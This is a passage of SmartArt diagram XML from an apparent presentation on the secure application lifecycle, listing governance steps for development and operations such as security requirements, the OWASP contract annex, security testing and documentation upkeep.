            <a:rPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Development</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{50BA5E83-AE4E-46AE-8B12-D8A409E939B6}" type="parTrans" cxnId="{BFD5987B-790A-46DA-920F-C96EEF5E138E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1503670-C21A-4576-9296-4A527617E61B}" type="sibTrans" cxnId="{BFD5987B-790A-46DA-920F-C96EEF5E138E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA3F6F59-5722-49A3-BD33-B61E09FADA36}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="93600" rIns="93600"/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Please review the +D "What's next for developers" for guidance</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E4117EEC-E583-4014-8071-4E4B30F2F4DA}" type="parTrans" cxnId="{FDC833AE-97A9-44DD-A533-5A655C406F09}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{178D0D67-3390-46DA-B4F4-4AE7D3BD7127}" type="sibTrans" cxnId="{FDC833AE-97A9-44DD-A533-5A655C406F09}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED2}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57600" indent="-57600" algn="l" rtl="0">
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Negotiate with internal or external developers the requirements, including guidelines and security requirements with respect to your security program, e.g. SDLC, best practices</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AE4D7BED-3056-429A-A072-E4C06F9FCBBF}" type="parTrans" cxnId="{630BF613-79F8-428F-8964-E241E474DFB8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFAF3F5C-16AC-4210-8AC4-B4A3C7CC1B6C}" type="sibTrans" cxnId="{630BF613-79F8-428F-8964-E241E474DFB8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{38AE7480-7652-45BF-902B-3CDB50BFC87C}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Rate the fulfillment of all technical requirements including a rough planning and design</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4DA77443-9D73-4A20-BDD9-210B60FB1DD2}" type="parTrans" cxnId="{AAC1F974-B9C8-4BFE-BBD1-76C85881508C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A0AF924-44F3-4E85-A6A0-8C2B19591341}" type="sibTrans" cxnId="{AAC1F974-B9C8-4BFE-BBD1-76C85881508C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3594AA0-97E8-4C14-838E-3318FD9F31BA}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Negotiate all technical requirements including design, security and service level agreements (SLA)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2FBA700C-8F05-4A21-A783-19309CA1F303}" type="parTrans" cxnId="{E03EFE4B-0B0B-4029-9732-F7BEFDB7F191}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{28E024FF-649C-4DA4-B591-E13659E50221}" type="sibTrans" cxnId="{E03EFE4B-0B0B-4029-9732-F7BEFDB7F191}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1FF0A6E-2F78-4408-A317-298E247EC346}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:spcBef>
              <a:spcPts val="0"/>
            </a:spcBef>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Consider to use templates and checklists, such as </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>OWASP Secure Software Contract Annex</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:br>
            <a:rPr lang="en-US" sz="300" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="1" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>NB:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> Please note that the Annex is a sample specific to US contract law, and is likely to need legal review in your jurisdiction. Please consult qualified legal advice before using the Annex.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1FAD385C-5640-4684-99C1-CD8D7B9367EC}" type="parTrans" cxnId="{0659AD39-6639-4CA3-8A06-7C7BC191064B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4442E183-7EFC-45D0-A172-626B150B1BB1}" type="sibTrans" cxnId="{0659AD39-6639-4CA3-8A06-7C7BC191064B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{283161DE-6A31-495D-AEDA-E52A0867C7C2}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Define a security architecture, controls, and countermeasures according the protection needs and the planned environmental security level. This should be supported by security specialists.</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Get the application owner to assume remaining risks or to provide additional resources.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{66AE2DF9-D615-419B-A3B1-718C325B9060}" type="parTrans" cxnId="{9FA5EEF9-FC1E-471E-AA6B-61CD14402259}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1EE3CF9-0D03-4600-9016-C008C52EB78A}" type="sibTrans" cxnId="{9FA5EEF9-FC1E-471E-AA6B-61CD14402259}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1479BB3-2B0C-4404-94D6-2197429E5F40}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Each sprint, ensure security stories are created for functional requirements, and constraints added for non-functional requirements</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60603B62-6E95-4C79-956F-0E46FA6C0400}" type="parTrans" cxnId="{3FDE2218-BCF2-4BF4-A33C-B58969BCEBA3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4C61C8C1-25B4-4A6F-8ED5-D3C3682DD4A8}" type="sibTrans" cxnId="{3FDE2218-BCF2-4BF4-A33C-B58969BCEBA3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2FB5AC92-D787-47E9-A8E0-874785E7D01D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Finalize all documentation, including the CMDB and security architecture</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{67DDCA22-2B9E-48F9-ACB1-97177E6A37E7}" type="sibTrans" cxnId="{27211054-6201-4BBF-B11C-0F8A5F77D857}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9A3BE978-25E1-4CB0-BA6E-35236DD4B70C}" type="parTrans" cxnId="{27211054-6201-4BBF-B11C-0F8A5F77D857}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{933D6626-D231-4265-9CE4-4D1A3BD3B2F8}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Put the application in operation and migrate from previously used applications</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A8F35C07-1C75-487E-919B-12B46E37C91D}" type="sibTrans" cxnId="{31DA2451-584D-4B8C-A9EE-92076B491997}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C2FE2552-A979-4557-ABB0-28F95833A4DB}" type="parTrans" cxnId="{31DA2451-584D-4B8C-A9EE-92076B491997}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{532A4E3A-AC9F-4A2C-BCD4-7F2F21810FBE}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Manage security tests according to internal processes, the protection needs and the level of security where the application is going to be deployed</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83C6655D-59FD-4627-B090-D39B28723CDC}" type="sibTrans" cxnId="{D6DE173D-29B0-4EA4-8E12-27679128E71E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D53410A-5D19-498F-84D3-E5833D1E777A}" type="parTrans" cxnId="{D6DE173D-29B0-4EA4-8E12-27679128E71E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{824964F5-1D4B-4657-BF8F-B8CB7F29BA6F}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Test the technical functions and integration to the IT architecture, and coordinate business tests. Consider to test use and abuse cases from technical and business perspectives.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5F4B3243-AB64-4B5C-907B-B5804F9F6613}" type="sibTrans" cxnId="{8FEAA379-1ADD-434A-92CA-ECBDBB724158}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CB7A1DCE-4432-43B0-ADC6-39A388E2179A}" type="parTrans" cxnId="{8FEAA379-1ADD-434A-92CA-ECBDBB724158}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{204E39CB-68FD-4773-B293-6D9865426AEA}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Regularly report all users and authorizations to the application owner and get them acknowledged</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{77DCEDC4-AA37-42C4-A588-F0F2ECD872FC}" type="parTrans" cxnId="{268F2544-CBD0-48AC-BCE9-E69B384BE5CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{242A8EE0-8E61-421D-B002-E7A3135FCC87}" type="sibTrans" cxnId="{268F2544-CBD0-48AC-BCE9-E69B384BE5CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55704B93-5F94-4687-A792-47C857A34372}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Raise the security awareness of users and manage conflicts about usability vs security</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7FB7129A-DDFA-42E9-B205-ED669672305B}" type="parTrans" cxnId="{3A7B1C12-69B2-42DC-9A21-0ECFCF5C6B33}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1B917D99-165F-4096-8C75-3E39C6DAB2F0}" type="sibTrans" cxnId="{3A7B1C12-69B2-42DC-9A21-0ECFCF5C6B33}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6A874C9-7B88-4F27-8B35-ABFC88D14CDE}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Plan and manage changes, e.g. migrate to new versions of the application or other components like OS, middleware and libraries</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{10575BF2-4870-406B-A308-EED75C9784E8}" type="parTrans" cxnId="{B863F56C-E4BF-4FAE-B8DA-9E87D454DF9B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F713B27B-1E6E-4ACF-A8E9-131433E0166E}" type="sibTrans" cxnId="{B863F56C-E4BF-4FAE-B8DA-9E87D454DF9B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4569E01A-8A62-4FF2-8EE0-CB955BF11CC1}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Update all documentation, including in CMDB and the security architecture, controls, and countermeasures, including any runbooks or project documentation</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F0E63742-1096-4C30-9EE6-1364D80A9C26}" type="parTrans" cxnId="{44BEB357-C51C-4028-AA9E-5217082C694E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F3E4FD0-F0DE-4DB1-A594-861A547229C5}" type="sibTrans" cxnId="{44BEB357-C51C-4028-AA9E-5217082C694E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" i="0" u="none" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Operating and Changes</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" baseline="0" noProof="0" dirty="0">
            <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AEE799B-7F35-4AE2-93E2-335733E35922}" type="sibTrans" cxnId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7BEB89D-4E4B-4D2E-BAF8-791B6EF09E28}" type="parTrans" cxnId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="90000" rIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57600" indent="-57600" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>It's critical that security tasks automated the secure setup of the application, interfaces and of all further components needed, including required authorizations</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CEDD41B6-F9E9-4738-8190-4FA86636363D}" type="parTrans" cxnId="{44036FFE-0AC2-47E1-8E4F-1EF89024A280}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F38BA272-2C4D-4E72-B1E6-C51DCA074847}" type="sibTrans" cxnId="{44036FFE-0AC2-47E1-8E4F-1EF89024A280}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" type="pres">
      <dgm:prSet presAssocID="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>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7" custScaleX="31579" custScaleY="24665">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
